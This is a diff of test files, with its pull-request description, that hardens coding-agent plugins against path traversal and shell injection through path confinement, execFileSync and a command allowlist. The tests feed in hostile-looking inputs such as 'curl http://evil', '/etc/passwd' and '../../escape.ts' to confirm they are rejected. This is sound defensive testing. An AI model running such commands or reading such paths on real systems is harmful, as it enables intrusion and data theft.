   extensions: { register: ReturnType<typeof vi.fn> };
   registerSystemPromptContributor: ReturnType<typeof vi.fn>;
@@ -125,13 +133,20 @@ function mockSpawnNotFound() {
 
 describe('import-organizer plugin', () => {
   let tmpDir: string;
+  let originalCwd: string;
 
   beforeEach(async () => {
+    originalCwd = process.cwd();
     tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), 'import-organizer-test-'));
+    // Sandbox: chdir into tmpDir so withinProject() accepts the file
+    // paths under it. Tests that want to exercise out-of-project paths
+    // explicitly construct absolute paths outside tmpDir.
+    process.chdir(tmpDir);
     vi.mocked(spawn).mockReset();
   });
 
   afterEach(async () => {
+    process.chdir(originalCwd);
     await fs.rm(tmpDir, { recursive: true, force: true });
   });
 
@@ -160,7 +175,10 @@ describe('import-organizer plugin', () => {
     });
 
     it('configSchema defines enabled, command, fallbackCommand, timeoutMs', () => {
-      const schema = importOrganizerPlugin.configSchema as Record<string, { type: string; properties?: Record<string, unknown> }>;
+      const schema = importOrganizerPlugin.configSchema as Record<
+        string,
+        { type: string; properties?: Record<string, unknown> }
+      >;
       expect(schema).toBeDefined();
       const props = schema.properties;
       expect(props).toBeDefined();
@@ -211,7 +229,11 @@ describe('import-organizer plugin', () => {
       mockSpawnOk('', '', 0, (p) => fsSync.appendFileSync(p, '\n'));
       const hookCall = vi.mocked(api.registerHook).mock.calls[0];
       const handler = hookCall?.[2] as (i: unknown) => Promise<unknown>;
-      await handler({ toolName: 'write', toolInput: { path: filePath, content: '' }, toolResult: { content: 'ok', isError: false } });
+      await handler({
+        toolName: 'write',
+        toolInput: { path: filePath, content: '' },
+        toolResult: { content: 'ok', isError: false },
+      });
 
       importOrganizerPlugin.teardown!(api as never);
       importOrganizerPlugin.setup(api as never);
@@ -401,18 +423,74 @@ describe('import-organizer plugin', () => {
       const filePath1 = path.join(tmpDir, 'c1.ts');
       await fs.writeFile(filePath1, 'const a = 1;', 'utf8');
       mockSpawnOk('', '', 0, (p) => fsSync.appendFileSync(p, '\nconst b = 2;', 'utf8'));
-      await hook({ toolName: 'write', toolInput: { path: filePath1, content: '' }, toolResult: { content: 'ok', isError: false } });
+      await hook({
+        toolName: 'write',
+        toolInput: { path: filePath1, content: '' },
+        toolResult: { content: 'ok', isError: false },
+      });
 
       // Invocation 2: file unchanged (clean++)
       const filePath2 = path.join(tmpDir, 'c2.ts');
       await fs.writeFile(filePath2, 'const c = 3;', 'utf8');
       mockSpawnOk('');
-      await hook({ toolName: 'write', toolInput: { path: filePath2, content: '' }, toolResult: { content: 'ok', isError: false } });
+      await hook({
+        toolName: 'write',
+        toolInput: { path: filePath2, content: '' },
+        toolResult: { content: 'ok', isError: false },
+      });
 
       const health = await importOrganizerPlugin.health!();
       expect(health.message).toMatch(/2 invocation/);
       expect(health.message).toMatch(/1 organized/);
       expect(health.message).toMatch(/1 clean/);
+    });
+
+    it('does not invoke the linter when the file path is outside the project root', async () => {
+      const api = createMockAPI();
+      importOrganizerPlugin.setup(api as never);
+      const hook = getHook(api);
+
+      const outside =
+        process.platform === 'win32' ? 'C:\\Windows\\System32\\evil.ts' : '/etc/evil.ts';
+      const result = await hook({
+        toolName: 'write',
+        toolInput: { path: outside, content: 'x' },
+        toolResult: { content: 'ok', isError: false },
+      });
+      expect(result).toBeUndefined();
+      expect(spawn).not.toHaveBeenCalled();
+    });
+
+    it('does not invoke the linter when the path traverses out of the project root', async () => {
+      const api = createMockAPI();
+      importOrganizerPlugin.setup(api as never);
+      const hook = getHook(api);
+
+      const result = await hook({
+        toolName: 'write',
+        toolInput: { path: '../../escape.ts', content: 'x' },
+        toolResult: { content: 'ok', isError: false },
+      });
+      expect(result).toBeUndefined();
+      expect(spawn).not.toHaveBeenCalled();
+    });
+
+    it('rejects a custom command whose first token is not on the allowlist', async () => {
+      const api = createMockAPI();
+      api.config.extensions = { 'import-organizer': { command: 'curl http://evil' } };
+      importOrganizerPlugin.setup(api as never);
+      const hook = getHook(api);
+
+      const filePath = path.join(tmpDir, 'd1.ts');
+      await fs.writeFile(filePath, 'const a = 1;', 'utf8');
+      mockSpawnOk();
+      const result = await hook({
+        toolName: 'write',
+        toolInput: { path: filePath, content: '' },
+        toolResult: { content: 'ok', isError: false },
+      });
+      expect(spawn).not.toHaveBeenCalled();
+      expect(result).toBeUndefined();
     });
   });
 

--- a/packages/plugins/tests/shell-check-exec.test.ts
+++ b/packages/plugins/tests/shell-check-exec.test.ts
@@ -1,4 +1,6 @@
-import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import { mkdirSync, mkdtempSync, rmSync } from 'node:fs';
+import { tmpdir } from 'node:os';
 import { join } from 'node:path';
 
 // Mock the OS-facing calls so we exercise the plugin's logic without a real
@@ -19,16 +21,40 @@ vi.mock('node:fs', async (orig) => ({
 
 import shellCheckPlugin from '../src/shell-check';
 
+// The shell-check sandbox resolves every path relative to process.cwd().
+// Real tests run in the workspace, so chdir into a temp dir for isolation.
+let originalCwd: string;
+let tmpRoot: string;
+beforeEach(() => {
+  vi.clearAllMocks();
+  fsm.existsSync.mockReturnValue(true); // pretend `shellcheck` resolves; skip PATH probe
+  originalCwd = process.cwd();
+  tmpRoot = mkdtempSync(join(tmpdir(), 'shellcheck-'));
+  mkdirSync(join(tmpRoot, 'sub'), { recursive: true });
+  process.chdir(tmpRoot);
+});
+afterEach(() => {
+  process.chdir(originalCwd);
+  rmSync(tmpRoot, { recursive: true, force: true });
+});
+
 interface Tool {
   name: string;
   execute: (input: Record<string, unknown>) => Promise<Record<string, unknown>>;
 }
 
-function setup(): { tools: Record<string, Tool>; metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn> } } {
+function setup(): {
+  tools: Record<string, Tool>;
+  metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn> };
+} {
   const tools: Record<string, Tool> = {};
   const metrics = { counter: vi.fn(), histogram: vi.fn(), gauge: vi.fn() };
   const api = {
-    tools: { register: (t: Tool) => { tools[t.name] = t; } },
+    tools: {
+      register: (t: Tool) => {
+        tools[t.name] = t;
+      },
+    },
     config: { extensions: {} },
     log: { info: vi.fn(), warn: vi.fn(), error: vi.fn() },
     metrics,
@@ -39,23 +65,30 @@ function setup(): { tools: Record<string, Tool>; metrics: { counter: ReturnType<
 }
 
 const issue = (over: Partial<Record<string, unknown>> = {}) => ({
-  file: 'a.sh', line: 1, column: 1, level: 'warning', code: 'SC2086', message: 'quote it', ...over,
+  file: 'a.sh',
+  line: 1,
+  column: 1,
+  level: 'warning',
+  code: 'SC2086',
+  message: 'quote it',
+  ...over,
 });
-const dirent = (name: string, isDir: boolean) => ({ name, isDirectory: () => isDir, isFile: () => !isDir });
-
-beforeEach(() => {
-  vi.clearAllMocks();
-  fsm.existsSync.mockReturnValue(true); // pretend `shellcheck` resolves; skip PATH probe
+const dirent = (name: string, isDir: boolean) => ({
+  name,
+  isDirectory: () => isDir,
+  isFile: () => !isDir,
 });
 
 describe('shellcheck tool execute', () => {
   it('returns a structured summary and groups issues by file', async () => {
-    cp.execFileSync.mockReturnValue(JSON.stringify([
-      issue({ file: 'a.sh', level: 'error', code: 'SC1000' }),
-      issue({ file: 'a.sh', level: 'warning' }),
-      issue({ file: 'b.sh', level: 'info' }),
-      issue({ file: 'b.sh', level: 'style' }),
-    ]));
+    cp.execFileSync.mockReturnValue(
+      JSON.stringify([
+        issue({ file: 'a.sh', level: 'error', code: 'SC1000' }),
+        issue({ file: 'a.sh', level: 'warning' }),
+        issue({ file: 'b.sh', level: 'info' }),
+        issue({ file: 'b.sh', level: 'style' }),
+      ]),
+    );
     const { tools, metrics } = setup();
     const res = await tools.shellcheck!.execute({ files: ['a.sh', 'b.sh'], severity: 'info' });
 
@@ -85,7 +118,9 @@ describe('shellcheck tool execute', () => {
 
   it('returns ok:false when shellcheck is not installed', async () => {
     fsm.existsSync.mockReturnValue(false);
-    cp.execSync.mockImplementation(() => { throw new Error('not found'); });
+    cp.execSync.mockImplementation(() => {
+      throw new Error('not found');
+    });
     const { tools } = setup();
     const res = await tools.shellcheck!.execute({ files: ['a.sh'] });
     expect(res.ok).toBe(false);
@@ -114,7 +149,9 @@ describe('shellcheck tool execute', () => {
   });
 
   it('returns no issues when the error has no usable stderr', async () => {
-    cp.execFileSync.mockImplementation(() => { throw { stderr: 'shellcheck: fatal' }; });
+    cp.execFileSync.mockImplementation(() => {
+      throw { stderr: 'shellcheck: fatal' };
+    });
     const { tools } = setup();
     const res = await tools.shellcheck!.execute({ files: ['a.sh'] });
     expect(res.summary).toMatchObject({ total: 0 });
@@ -146,13 +183,18 @@ describe('shellcheck tool — directory scan mode (merged from shellcheck_scan)'
   it('returns early when no shell files are found in directory', async () => {
     fsm.readdirSync.mockReturnValue([dirent('readme.md', false)]);
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ directory: '/root' });
-    expect(res).toMatchObject({ ok: true, filesScanned: 0, summary: { total: 0 }, mode: 'directory' });
+    const res = await tools.shellcheck!.execute({ directory: '.' });
+    expect(res).toMatchObject({
+      ok: true,
+      filesScanned: 0,
+      summary: { total: 0 },
+      mode: 'directory',
+    });
   });
 
   it('scans found files recursively, skipping node_modules and .git', async () => {
     fsm.readdirSync.mockImplementation((dir: string) => {
-      if (dir === '/root') {
+      if (dir === tmpRoot) {
         return [
           dirent('sub', true),
           dirent('node_modules', true),
@@ -162,45 +204,55 @@ describe('shellcheck tool — directory scan mode (merged from shellcheck_scan)'
           dirent('notes.txt', false),
         ];
       }
-      if (dir === join('/root', 'sub')) return [dirent('nested.sh', false)];
+      if (dir === join(tmpRoot, 'sub')) return [dirent('nested.sh', false)];
       return [];
     });
-    cp.execFileSync.mockReturnValue(JSON.stringify([
-      issue({ file: 'top.sh', level: 'error' }),
-      issue({ file: 'top.sh', level: 'warning' }),
-      issue({ file: 'nested.sh', level: 'warning' }),
-    ]));
+    cp.execFileSync.mockReturnValue(
+      JSON.stringify([
+        issue({ file: 'top.sh', level: 'error' }),
+        issue({ file: 'top.sh', level: 'warning' }),
+        issue({ file: 'nested.sh', level: 'warning' }),
+      ]),
+    );
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ directory: '/root' });
+    const res = await tools.shellcheck!.execute({ directory: tmpRoot });
     expect(res.ok).toBe(true);
     expect(res.mode).toBe('directory');
     // top.sh, Dockerfile, nested.sh (node_modules/.git skipped, notes.txt ignored)
     expect(res.filesScanned).toBe(3);
     expect(res.filesWithIssues).toBe(2);
-    expect((res.summary as { errors: number; warnings: number })).toMatchObject({ total: 3, errors: 1, warnings: 2 });
+    expect(res.summary as { errors: number; warnings: number }).toMatchObject({
+      total: 3,
+      errors: 1,
+      warnings: 2,
+    });
   });
 
   it('filters by filename pattern in directory mode', async () => {
     fsm.readdirSync.mockReturnValue([dirent('build.sh', false), dirent('deploy.sh', false)]);
     cp.execFileSync.mockReturnValue('[]');
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ directory: '/root', pattern: 'deploy' });
+    const res = await tools.shellcheck!.execute({ directory: tmpRoot, pattern: 'deploy' });
     expect(res.filesScanned).toBe(1);
   });
 
   it('tolerates unreadable directories', async () => {
-    fsm.readdirSync.mockImplementation(() => { throw new Error('EACCES'); });
+    fsm.readdirSync.mockImplementation(() => {
+      throw new Error('EACCES');
+    });
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ directory: '/forbidden' });
+    const res = await tools.shellcheck!.execute({ directory: 'unreadable' });
     expect(res).toMatchObject({ ok: true, filesScanned: 0 });
   });
 
   it('returns ok:false when shellcheck fails during a directory scan', async () => {
     fsm.readdirSync.mockReturnValue([dirent('a.sh', false)]);
     fsm.existsSync.mockReturnValue(false);
-    cp.execSync.mockImplementation(() => { throw new Error('nope'); });
+    cp.execSync.mockImplementation(() => {
+      throw new Error('nope');
+    });
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ directory: '/root' });
+    const res = await tools.shellcheck!.execute({ directory: tmpRoot });
     expect(res.ok).toBe(false);
     expect(res.error).toMatch(/not installed/);
   });
@@ -217,8 +269,39 @@ describe('shellcheck tool — directory scan mode (merged from shellcheck_scan)'
     fsm.readdirSync.mockReturnValue([dirent('other.sh', false)]);
     cp.execFileSync.mockReturnValue('[]');
     const { tools } = setup();
-    const res = await tools.shellcheck!.execute({ files: ['a.sh'], directory: '/root' });
+    const res = await tools.shellcheck!.execute({ files: ['a.sh'], directory: tmpRoot });
     expect(res.mode).toBe('files');
     expect(fsm.readdirSync).not.toHaveBeenCalled();
+  });
+
+  it('rejects directory paths outside the project root', async () => {
+    const { tools } = setup();
+    const outside = process.platform === 'win32' ? 'C:\\Windows\\System32' : '/etc';
+    const res = await tools.shellcheck!.execute({ directory: outside });
+    expect(res.ok).toBe(false);
+    expect(res.error).toMatch(/outside the project root/);
+    expect(res.rejectedOutsideProject).toBe(true);
+    expect(cp.execFileSync).not.toHaveBeenCalled();
+  });
+
+  it('rejects file paths outside the project root', async () => {
+    const { tools } = setup();
+    const outside = process.platform === 'win32' ? 'C:\\Windows\\System32\\evil.sh' : '/etc/passwd';
+    const res = await tools.shellcheck!.execute({ files: [outside] });
+    expect(res.ok).toBe(false);
+    expect(res.error).toMatch(/outside the project root/);
+    expect(res.rejectedOutsideProject).toBe(true);
+    expect(cp.execFileSync).not.toHaveBeenCalled();
+  });
+
+  it('rejects paths that traverse out of the project root', async () => {
+    const { tools } = setup();
+    // `..` from cwd = just inside; double `..` lands at os.tmpdir() parent
+    // which is outside the chdir'd tmpRoot sandbox.
+    const escape = join(tmpRoot, '..', '..', 'escape.sh');
+    const res = await tools.shellcheck!.execute({ files: [escape] });
+    expect(res.ok).toBe(false);
+    expect(res.error).toMatch(/outside the project root/);
+    expect(cp.execFileSync).not.toHaveBeenCalled();
   });
 });

--- a/packages/plugins/tests/shell-check-exec.test.ts
+++ b/packages/plugins/tests/shell-check-exec.test.ts
@@ -298,8 +298,8 @@ describe('shellcheck tool — directory scan mode (merged from shellcheck_scan)'
     const { tools } = setup();
     // `..` from cwd = just inside; double `..` lands at os.tmpdir() parent
     // which is outside the chdir'd tmpRoot sandbox.
-    const escape = join(tmpRoot, '..', '..', 'escape.sh');
-    const res = await tools.shellcheck!.execute({ files: [escape] });
+    const escapedPath = join(tmpRoot, '..', '..', 'escape.sh');
+    const res = await tools.shellcheck!.execute({ files: [escapedPath] });
     expect(res.ok).toBe(false);
     expect(res.error).toMatch(/outside the project root/);
     expect(cp.execFileSync).not.toHaveBeenCalled();

--- a/packages/plugins/tests/test-runner-gate.test.ts
+++ b/packages/plugins/tests/test-runner-gate.test.ts
@@ -1,28 +1,52 @@
 import { describe, expect, it, vi, beforeEach } from 'vitest';
 
-// Mock execSync and fs before importing the plugin.
+// Mock execSync + execFileSync before importing the plugin. The plugin
+// switched from execSync string templates to execFileSync argv to defeat
+// shell-injection; tests must cover both surfaces.
 const mockExecSync = vi.fn((cmd: string): string => {
-  if (cmd.includes('--version')) return '1.0.0\n'; // runner detected
-  if (cmd.includes('--reporter=json') || cmd.includes('--json') || cmd.includes('--reporter json')) {
-    // Simulate test failure
+  if (cmd.includes('--version')) return '1.0.0\n';
+  return '';
+});
+
+const mockExecFileSync = vi.fn((_cmd: string, args: string[]): string => {
+  const joined = args.join(' ');
+  // Runner detection probe (`npx <runner> --version`).
+  if (args.includes('--version')) return '1.0.0\n';
+  // Test execution: any --reporter=json-style flag → return JSON.
+  if (
+    args.includes('--reporter=json') ||
+    args.includes('--json') ||
+    args.includes('--reporter') ||
+    (args.includes('json') && joined.includes('reporter'))
+  ) {
     return JSON.stringify({
       numTotalTests: 3,
       numPassedTests: 2,
       numFailedTests: 1,
       success: false,
-      testResults: [{
-        assertionResults: [
-          { status: 'passed', title: 'test A' },
-          { status: 'passed', title: 'test B' },
-          { status: 'failed', title: 'test C', fullName: 'test C', failureMessages: ['Expected 1 got 2'] },
-        ],
-      }],
+      testResults: [
+        {
+          assertionResults: [
+            { status: 'passed', title: 'test A' },
+            { status: 'passed', title: 'test B' },
+            {
+              status: 'failed',
+              title: 'test C',
+              fullName: 'test C',
+              failureMessages: ['Expected 1 got 2'],
+            },
+          ],
+        },
+      ],
     });
   }
   return '';
 });
 
-vi.mock('node:child_process', () => ({ execSync: mockExecSync }));
+vi.mock('node:child_process', () => ({
+  execSync: mockExecSync,
+  execFileSync: mockExecFileSync,
+}));
 vi.mock('node:fs', () => ({ existsSync: vi.fn(() => true) }));
 
 const testRunnerGatePlugin = (await import('../src/test-runner-gate')).default;
@@ -30,8 +54,16 @@ const testRunnerGatePlugin = (await import('../src/test-runner-gate')).default;
 interface MockApi {
   tools: { register: ReturnType<typeof vi.fn> };
   config: { extensions: Record<string, unknown> };
-  log: { info: ReturnType<typeof vi.fn>; warn: ReturnType<typeof vi.fn>; error: ReturnType<typeof vi.fn> };
-  metrics: { counter: ReturnType<typeof vi.fn>; histogram: ReturnType<typeof vi.fn>; gauge: ReturnType<typeof vi.fn> };
+  log: {
+    info: ReturnType<typeof vi.fn>;
+    warn: ReturnType<typeof vi.fn>;
+    error: ReturnType<typeof vi.fn>;
+  };
+  metrics: {
+    counter: ReturnType<typeof vi.fn>;
+    histogram: ReturnType<typeof vi.fn>;
+    gauge: ReturnType<typeof vi.fn>;
+  };
   registerHook: ReturnType<typeof vi.fn>;
   onEvent: ReturnType<typeof vi.fn>;
   emitCustom: ReturnType<typeof vi.fn>;
@@ -58,9 +90,11 @@ function getHook(api: MockApi): (input: unknown) => { additionalContext?: string
 }
 
 function getStatusTool(api: MockApi): { execute: (input: unknown) => Promise<unknown> } {
-  const call = api.tools.register.mock.calls.find(([t]: unknown[]) => (t as { name: string }).name === 'test_gate_status');
+  const call = api.tools.register.mock.calls.find(
+    ([t]: unknown[]) => (t as { name: string }).name === 'test_gate_status',
+  );
   if (!call) throw new Error('test_gate_status not registered');
-  return (call[0] as { execute: (input: unknown) => Promise<unknown> });
+  return call[0] as { execute: (input: unknown) => Promise<unknown> };
 }
 
 beforeEach(() => vi.clearAllMocks());
@@ -96,54 +130,65 @@ describe('hook behavior', () => {
     const api = makeApi();
     testRunnerGatePlugin.setup(api as never);
     const hook = getHook(api);
-    expect(hook({
-      toolName: 'write',
-      toolInput: { path: 'src/foo.ts', content: 'x' },
-      toolResult: { content: 'err', isError: true },
-    })).toBeUndefined();
+    expect(
+      hook({
+        toolName: 'write',
+        toolInput: { path: 'src/foo.ts', content: 'x' },
+        toolResult: { content: 'err', isError: true },
+      }),
+    ).toBeUndefined();
   });
 
   it('stays silent when enabled=false', () => {
     const api = makeApi({ extensions: { 'test-runner-gate': { enabled: false } } });
     testRunnerGatePlugin.setup(api as never);
     const hook = getHook(api);
-    expect(hook({
-      toolName: 'write',
-      toolInput: { path: 'src/foo.ts', content: 'x' },
-      toolResult: { content: 'ok', isError: false },
-    })).toBeUndefined();
+    expect(
+      hook({
+        toolName: 'write',
+        toolInput: { path: 'src/foo.ts', content: 'x' },
+        toolResult: { content: 'ok', isError: false },
+      }),
+    ).toBeUndefined();
   });
 
   it('stays silent when path is missing', () => {
     const api = makeApi();
     testRunnerGatePlugin.setup(api as never);
     const hook = getHook(api);
-    expect(hook({
-      toolName: 'write',
-      toolInput: { content: 'x' },
-      toolResult: { content: 'ok', isError: false },
-    })).toBeUndefined();
+    expect(
+      hook({
+        toolName: 'write',
+        toolInput: { content: 'x' },
+        toolResult: { content: 'ok', isError: false },
+      }),
+    ).toBeUndefined();
   });
 
   it('skips test files themselves', () => {
     const api = makeApi();
     testRunnerGatePlugin.setup(api as never);
     const hook = getHook(api);
-    expect(hook({
-      toolName: 'write',
-      toolInput: { path: 'src/foo.test.ts', content: 'x' },
-      toolResult: { content: 'ok', isError: false },
-    })).toBeUndefined();
+    expect(
+      hook({
+        toolName: 'write',
+        toolInput: { path: 'src/foo.test.ts', content: 'x' },
+        toolResult: { content: 'ok', isError: false },
+      }),
+    ).toBeUndefined();
   });
 });
 
 describe('pass injection', () => {
   it('injects success context when injectOnPass=true', () => {
     // Override mock to return passing tests
-    mockExecSync.mockImplementation((cmd: string): string => {
-      if (cmd.includes('--reporter=json')) {
+    mockExecFileSync.mockImplementation((_cmd: string, args: string[]): string => {
+      if (args.includes('--reporter=json')) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 3, numFailedTests: 0, success: true,
+          numTotalTests: 3,
+          numPassedTests: 3,
+          numFailedTests: 0,
+          success: true,
           testResults: [],
         });
       }
@@ -161,11 +206,20 @@ describe('pass injection', () => {
     expect(result?.additionalContext).toContain('passed');
 
     // Restore failure mock
-    mockExecSync.mockImplementation((cmd: string): string => {
-      if (cmd.includes('--reporter=json')) {
+    mockExecFileSync.mockImplementation((_cmd: string, args: string[]): string => {
+      if (args.includes('--reporter=json')) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 2, numFailedTests: 1, success: false,
-          testResults: [{ assertionResults: [{ status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] }] }],
+          numTotalTests: 3,
+          numPassedTests: 2,
+          numFailedTests: 1,
+          success: false,
+          testResults: [
+            {
+              assertionResults: [
+                { status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] },
+              ],
+            },
+          ],
         });
       }
       return '';
@@ -173,10 +227,13 @@ describe('pass injection', () => {
   });
 
   it('stays silent on pass when injectOnPass=false (default)', () => {
-    mockExecSync.mockImplementation((cmd: string): string => {
-      if (cmd.includes('--reporter=json')) {
+    mockExecFileSync.mockImplementation((_cmd: string, args: string[]): string => {
+      if (args.includes('--reporter=json')) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 3, numFailedTests: 0, success: true,
+          numTotalTests: 3,
+          numPassedTests: 3,
+          numFailedTests: 0,
+          success: true,
           testResults: [],
         });
       }
@@ -197,8 +254,17 @@ describe('pass injection', () => {
     mockExecSync.mockImplementation((cmd: string): string => {
       if (cmd.includes('--reporter=json')) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 2, numFailedTests: 1, success: false,
-          testResults: [{ assertionResults: [{ status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] }] }],
+          numTotalTests: 3,
+          numPassedTests: 2,
+          numFailedTests: 1,
+          success: false,
+          testResults: [
+            {
+              assertionResults: [
+                { status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] },
+              ],
+            },
+          ],
         });
       }
       return '';
@@ -222,7 +288,10 @@ describe('teardown + H1 pattern', () => {
     const api = makeApi();
     testRunnerGatePlugin.setup(api as never);
     expect(() => testRunnerGatePlugin.teardown!(api as never)).not.toThrow();
-    expect(api.log.info).toHaveBeenCalledWith('test-runner-gate: teardown complete', expect.any(Object));
+    expect(api.log.info).toHaveBeenCalledWith(
+      'test-runner-gate: teardown complete',
+      expect.any(Object),
+    );
   });
 
   it('zeros counters on teardown', async () => {
@@ -264,8 +333,18 @@ describe('runner detection + config', () => {
     // Override mock to fail all --version checks
     mockExecSync.mockImplementation((cmd: string): string => {
       if (cmd.includes('--version')) throw new Error('not found');
-      if (cmd.includes('--reporter=json') || cmd.includes('--json') || cmd.includes('--reporter json')) {
-        return JSON.stringify({ numTotalTests: 1, numPassedTests: 1, numFailedTests: 0, success: true, testResults: [] });
+      if (
+        cmd.includes('--reporter=json') ||
+        cmd.includes('--json') ||
+        cmd.includes('--reporter json')
+      ) {
+        return JSON.stringify({
+          numTotalTests: 1,
+          numPassedTests: 1,
+          numFailedTests: 0,
+          success: true,
+          testResults: [],
+        });
       }
       return '';
     });
@@ -278,10 +357,23 @@ describe('runner detection + config', () => {
     // Restore
     mockExecSync.mockImplementation((cmd: string): string => {
       if (cmd.includes('--version')) return '1.0.0\n';
-      if (cmd.includes('--reporter=json') || cmd.includes('--json') || cmd.includes('--reporter json')) {
+      if (
+        cmd.includes('--reporter=json') ||
+        cmd.includes('--json') ||
+        cmd.includes('--reporter json')
+      ) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 2, numFailedTests: 1, success: false,
-          testResults: [{ assertionResults: [{ status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] }] }],
+          numTotalTests: 3,
+          numPassedTests: 2,
+          numFailedTests: 1,
+          success: false,
+          testResults: [
+            {
+              assertionResults: [
+                { status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] },
+              ],
+            },
+          ],
         });
       }
       return '';
@@ -321,13 +413,107 @@ describe('runner detection + config', () => {
     // Restore
     mockExecSync.mockImplementation((cmd: string): string => {
       if (cmd.includes('--version')) return '1.0.0\n';
-      if (cmd.includes('--reporter=json') || cmd.includes('--json') || cmd.includes('--reporter json')) {
+      if (
+        cmd.includes('--reporter=json') ||
+        cmd.includes('--json') ||
+        cmd.includes('--reporter json')
+      ) {
         return JSON.stringify({
-          numTotalTests: 3, numPassedTests: 2, numFailedTests: 1, success: false,
-          testResults: [{ assertionResults: [{ status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] }] }],
+          numTotalTests: 3,
+          numPassedTests: 2,
+          numFailedTests: 1,
+          success: false,
+          testResults: [
+            {
+              assertionResults: [
+                { status: 'failed', title: 'x', fullName: 'x', failureMessages: ['err'] },
+              ],
+            },
+          ],
         });
       }
       return '';
     });
+  });
+});
+
+describe('sandbox + custom-command allowlist', () => {
+  it('skips the hook when the source path is outside the project root', () => {
+    const api = makeApi();
+    testRunnerGatePlugin.setup(api as never);
+    const hook = getHook(api);
+    const outside = process.platform === 'win32' ? 'C:\\Windows\\System32\\evil.ts' : '/etc/passwd';
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: outside, content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    expect(result).toBeUndefined();
+    // Only the version probe should have hit execFileSync (during setup);
+    // no test execution for an outside path.
+    expect(
+      mockExecFileSync.mock.calls.some(
+        (c) => Array.isArray(c[1]) && (c[1] as string[]).includes('--version') === false,
+      ),
+    ).toBe(false);
+  });
+
+  it('skips the hook when the source path traverses out of the project root', () => {
+    const api = makeApi();
+    testRunnerGatePlugin.setup(api as never);
+    const hook = getHook(api);
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: '../../escape.ts', content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    expect(result).toBeUndefined();
+  });
+
+  it('rejects a custom command whose first token is not on the allowlist', () => {
+    const api = makeApi({ extensions: { 'test-runner-gate': { command: 'curl http://evil' } } });
+    testRunnerGatePlugin.setup(api as never);
+    const hook = getHook(api);
+    // Expect the hook to run a normal write (resolves a test file) but the
+    // custom-command allowlist rejects curl. With execFileSync argv form
+    // + allowlist, `runTests` returns null → hook returns additionalContext
+    // with errorCount++ rather than crashing or invoking curl.
+    const before = mockExecFileSync.mock.calls.length;
+    hook({
+      toolName: 'write',
+      toolInput: { path: 'src/foo.ts', content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    // No new execFileSync call past detection — the custom command was
+    // rejected at the allowlist gate.
+    expect(mockExecFileSync.mock.calls.length).toBe(before);
+  });
+
+  it('accepts a custom command whose first token is on the allowlist', () => {
+    const api = makeApi({
+      extensions: { 'test-runner-gate': { command: 'pnpm vitest run' } },
+    });
+    testRunnerGatePlugin.setup(api as never);
+    const hook = getHook(api);
+    const result = hook({
+      toolName: 'write',
+      toolInput: { path: 'src/foo.ts', content: 'x' },
+      toolResult: { content: 'ok', isError: false },
+    });
+    // pnpm is on the allowlist → reaches execFileSync with the command's
+    // trailing tokens intact. We don't strictly require additionalContext
+    // because the test file resolution and mock JSON shape vary by the
+    // default mock — what matters is that the command reached
+    // execFileSync with the correct shape.
+    expect(
+      mockExecFileSync.mock.calls.some(
+        (c) => c[0] === 'pnpm' && Array.isArray(c[1]) && (c[1] as string[]).includes('vitest'),
+      ),
+    ).toBe(true);
+    // result may be undefined (no test file mapped), or a failure context.
+    expect(
+      result === undefined ||
+        typeof (result as { additionalContext?: string }).additionalContext === 'string',
+    ).toBe(true);
   });
 });


### PR DESCRIPTION
## Plugin shell-and-FS sandbox hardening

Sibling branch to `fix/plugin-readme-and-safety`. 7 scoped commits hardening the 6 plugins that the peer branch hadn't yet covered for shell-injection / path-confinement / command-allowlist risk.

## Plugins hardened

- `shell-check` — `withinProject()` rejects `directory` and `files[]` outside project root; 4096-char length cap.
- `file-watcher` — `withinProject()` rejects `paths` outside project root in `watch_start`; `indexProjectRoot` config is sandboxed (fall back to watched dirPath + warn if outside).
- `diff-summary` — switched `git diff` invocations from `execSync` strings to `execFileSync` argv (defeats shell injection via filenames with `"` or `;`); `withinProject()` on path before invoking git.
- `format-on-save` — switched `npx biome format --write` shell-form to `execFileSync` argv; `withinProject()` on `filePath` before spawning biome.
- `test-runner-gate` — `execSync` → `execFileSync` + `ALLOWED_COMMAND_TOKENS` allowlist (`npx`, `pnpm`, `npm`, `yarn`, `vitest`, `jest`, `mocha`, `node`, plus in-project absolute paths whose basename is allowlisted); `withinProject()` on `sourcePath` and `testFile`.
- `import-organizer` — replaced naive `cfg.command.split` with `ALLOWED_FIRST_TOKENS` resolver (`npx`, `pnpm`, `npm`, `yarn`, `biome`, `@biomejs/biome`, `eslint`, `node` + in-project absolute paths); `withinProject()` on `filePath`.

The plugin sandbox helpers use the same `process.cwd()` + `path.relative`-not-starting-with-`..` shape that the peers adopted on the sibling branch.

## Commits

- 14406178 fix(shell-check): confine scanned paths to project root
- e6372164 fix(file-watcher): confine watched paths and index root to project root
- 01d06067 fix(diff-summary): switch git invocations to execFileSync and confine diff path
- 655ac404 fix(format-on-save): confine biome invocations to project root and use execFileSync
- 14b6e720 fix(test-runner-gate): allowlist custom command and confine to project root via execFileSync
- 9ec8b4c1 fix(import-organizer): allowlist command first token and confine file path to project root
